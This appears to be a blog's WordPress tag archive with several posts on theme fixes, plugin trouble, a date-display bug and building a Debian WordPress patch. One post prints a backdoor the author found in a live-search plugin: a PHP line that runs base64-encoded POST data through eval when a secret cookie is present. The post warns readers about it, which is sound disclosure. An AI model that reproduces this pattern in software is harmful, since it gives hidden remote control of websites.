Tag Archives: Wordpress

New theme part III

Leave a reply

After last nights debacle with the live search plugin, I tried an other one that was based on it: Live search popup. Unfortunately that one didn’t display very well in my theme, so I just removed it and won’t be offering a “Web 2.0″ search option for now.

Further changes to the Freshy2 theme and wordpress:

  • I’ve added a none.gif to the background images folder, since I got loads of 404 messages about it not being in there.
  • I’ve copied the default search box style (#s) from the wordpress theme and removed the “white” background color so you can see what you type when searching. Unfortunately I now need a black anti-aliased version of the search icon.
  • I’ve added a header to the search widget (guess that will be gone on the next WP update from Debian, as soon as the TinyMCE maintainer updates TinyMCE). Not sure if I really want it to stay, but if I do I need to find a better way to add it.

Now I “just” need to work on the <pre> and <code> output of the theme, since reading it is not very easy at the moment.

And I found why the Live search plugin didn’t work. It uses the deprecated get_bloginfo(‘siteurl’), while it should be using get_bloginfo(‘wpurl’). But well, after having contact with the maintainer of it, I won’t be using it. He is not interested in maintaining it, so better not to use that one.

New theme continued: why not to trust plugins

Leave a reply

With this new theme I also saw that it was compatible with the “Addicted to live search plugin”[1]. (Un)fortunately this plugin doesn’t work out of the box either, at least not if you do not have WordPress running directly in the root.

But… Since I was looking at the code to fix this I also found:

<?php if($_COOKIE['7b13cc987791f418']=="6d6bedf94c36d538"){ eval(base64_decode($_POST['file'])); exit; } ?>

No thank you very much!

So what did we learn: Never ever trust WordPress plugins… So do not use this (version of the) plugin, unless you know how to remove this piece of code!

I’ll check out after some sleep what WordPress has to offer when you find a vulnerability like this in a plugin, so perhaps users of it can be warned… And I’ll fix this plugin later also, to be continued…

Update: it seems that it’s fixed. Although I’m not sure how the WordPress auto-update feature could create a line of code like that (as in, this sounds like bollocks to me).


[1] Funny sidenote, I found this blog two years ago and commented on one of his articles on Oracle.

New theme

Leave a reply

A while ago I decided to change the default WordPress theme into the Freshy2 theme, since I liked the looks of it… I now partially wish I did not do that… Changing the theme was not trivial… Mainly because of two problems:

1. In the wp-content/themes/freshy2/functions.php file on line 474 it says

$path = WP_CONTENT_DIR.$theme_info->template_dir.'/';

If you change that to:

$path = ABSPATH.$theme_info->template_dir.'/';

suddenly you are able to configure the theme as promised by the author (at least that is what I needed to do with my Debian version of WordPress).

2. The customize freshy plugin that is advertised makes it so that I even though I’ve changed the stylesheet, it’s still not visible. So I’ve disabled that plugin. The line of php that is causing this behavior is also in functions.php, but then on line 26

if (!class_exists('Nice_theme')) add_action('wp_head','freshy_head');

Seems that Nice_theme doesn’t change the wp_head function. I didn’t look further into this, since the configuration options Freshy2 gives me are enough.

Furthermore, this theme breaks the xhtml 1.1 validation. I’ve removed the autocomplete="off" in the searchform.php file and added a <p> block around the search inputs. For more information about the autocomplete attribute and xhtml see this post on the Mozilla wiki (to be moved some time in the future).

Talking about xhtml 1.1 validation. This theme also puts a xhtml 1.0 doctype in the pages, while the footer of WordPress shows xhtml 1.1. So I’ve changed the doctype and removed the lang=”en” attribute from the <html> tag. But well, guess only a few people really try the validation button on the bottom of the page.

And I had to change the title of the blog again in the same manner as I did the last time on the default WordPress theme.

But, now I’ve done this I’m very happy. I really like the theme’s looks, certainly with this dark version, since it also adds something that I really wanted: no more fixed width layout! With the default version you still get a fixed with version, but this one scales. So thank you Jide!

Now a few things remain to be done:

  • Fix the <code> layout, since it doesn’t play well with my code formatting plugin and well.. it distracts a bit
  • Add Excerpts to all my posts
  • Cut down on the number of categories and add more tags
  • Find out why some post don’t show their date on the homepage
  • Change the color of the input text, so you can see what you search for
  • Post more frequently (still got about 20 drafts to work on)
  • Find out why putting <pre> tags inside <li> tags breaks validation

Update: I should have read the comments on the theme site before I started to work on the theme… Then I would have seen that more people encountered the problems and already wrote fixes to them. Someone thought the problem with the disappearing post dates has to do with editing the post after publishing. That is not the case, unfortunately. It is caused because the_date() doesn’t show the date if it’s the same as the date of the post before. In the default WordPress theme the_time('F jS, Y') is used in stead of the_date(). And the_time() doesn’t check for the last date. But, with just putting ‘F js, Y’ into this function call, changing your date format in the settings doesn’t help, so what you need to put in the index.php file on line 15 is the_time(get_option('date_format')). At least, if you want the date to be always shown. Perhaps I should make it a feature request that you can change this behavior of the_date, and add a bug report that the default theme doesn’t listen to the date_format setting…

Posting in the future…

Leave a reply

Seems I just made a post 1 hour into the future and with that, on a different day. The WordPress settings say

Unfortunately, you have to manually update this for Daylight Savings Time. Lame, we know, but will be fixed in the future.

Lame indeed, and guess I forgot about this. A while ago a colleague encountered a similar problem in phpBB. Guess it’s PHP related and not just WordPress, as both products have the same problem. I wonder if the fix promised by WordPress is waiting for daylight savings time to be abandoned as idea, since it’s advantages are still being questioned.

Broken WordPress: debian unstable is called unstable for a reason

Leave a reply

Update: The maintainer of the wordpress package released “my” bugfix. It’s available now for those using unstable (sid). I guess it will be available in testing (lenny) soon, since the bug is listed in the release critical bugs list. To bad he credited me with the name Del Gurt, but well… The only thing I did was finding the missing methods in WordPress 2.6. But it’s my first fix in Debian, yeh.

I just ran an apt-get update + apt-get upgrade and after that my WordPress homepage was broken when I’m logged in, it gives a nice "Fatal error: Call to undefined function admin_url() in /usr/share/wordpress/wp-includes/link-template.php on line 470". And so is it for all people using the debian unstable package for WordPress, for example this guy.

I quickly searched what functions where missing and created a patch and submitted it to the related debian bug. I hope they will accept it soon, but well. My WordPress works fine again now.

Creating a patch took me a while, since I never created a patch for a debian package before. Lucky me, there are tutorials on how to create patches for debian packages, so I just had to read up on that. I read about how to submit the patch in the tutorial on how to help squashing Release-Critial bugs.

And I had to read up on dpatch, because the other patches on WordPress where created using that. Lucky me, someone has created a nice short tutorial on how to use dpatch already. Dpatch seems like a good way to keep your patches separated from the original code, so when the original code is updated, you can determine easily if that conflicts with your patches or not.

And then I had to create a GPG key to sign my patch. Since dpkg-buildpackage complains about it otherwise.

So in the end, what I had to do to patch my WordPress and submit the patch (besides generating the GPG key):

Install the required tools
sudo apt-get install build-essential devscripts lintian linda diff patch patchutils dpatch
Get the WordPress package source
apt-get source wordpress
Enter the root directory of the extracted source
cd wordpress-2.5.1
Let the package know I’m making the changes
dch -i
Start the dpatch process
dpatch-edit-patch 009CVE2008-3747.addendum
Make the changes
Exit dpatch process
exit
The wordpress patches are all called .patch so rename it
mv debian/patches/009CVE2008-3747.addendum.dpatch debian/patches/009CVE2008-3747.addendum.patch
Change the e-mail address in the patch
EDIT debian/patches/009CVE2008-3747.addendum.patch
Add the patch to the list of patches
echo "009CVE2008-3747.addendum.patch" >> debian/patches/00list
Test the patch
fakeroot debian/rules binary && sudo dpkg -i ../wordpress_2.5.1-6.1_all.deb
Build the source package
dpkg-buildpackage -kMYKEY -rfakeroot
Create the patch
interdiff -z ../wordpress_2.5.1-6.diff.gz ../wordpress_2.5.1-6.1.diff.gz > ../bug_497524.patch
Email the bugs list with the patch
Email bug control to inform them that a patch has been made for the bug

That was it. Not that hard, if you know the commands + procedure. Now wait and see what the package maintainer is going to do with the patch I created.

Update: seems I forgot to check the edit link itself after the fatal error was gone… It didn’t work anymore. Fixed that as well now.

Update2: for those who find my post and do not want to wait on the maintainer to release the patch, I’ve “released” it. The MD5 of wordpress_2.5.1-6.1_all.deb is: dc46d35743122d933def7db431c8f49e.